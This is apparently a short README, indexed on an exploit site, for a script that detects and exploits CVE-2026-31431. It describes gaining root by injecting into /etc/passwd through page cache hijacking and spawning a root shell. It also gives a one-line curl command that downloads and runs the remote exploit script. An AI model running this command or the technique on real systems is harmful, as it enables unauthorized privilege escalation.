## https://sploitus.com/exploit?id=479E8F99-F98A-56A3-8D66-9AE84150CE5F
# CVE-2026-31431 Audit



This project provides a professional Python script designed to check if a system is vulnerable to **CVE-2026-31431** and demonstrates how to exploit it for research purposes.
## ๐ Core Features
* **`[SCAN]` Detection**: Checks if the current kernel is affected by the CVE-2026-31431 vulnerability using a non-destructive shadow sequence.
* **`[PUNCH]` Exploitation**: Leverages the vulnerability via page cache hijacking to inject data into `/etc/passwd` for privilege escalation simulation.
* **`[SHELL]` Verification**: Invokes an interactive environment to verify the elevated privileges and gain root access.
* **`[CLEAN]` Cleanup**: Flushes the system page cache to restore the audit state and ensure system consistency.
## ๐ Usagee
```bash
curl -fsSL https://raw.githubusercontent.com/MarioHY/cve_2026_31431_audit/main/exploit.py -o exploit.py && chmod +x exploit.py && ./exploit.py
```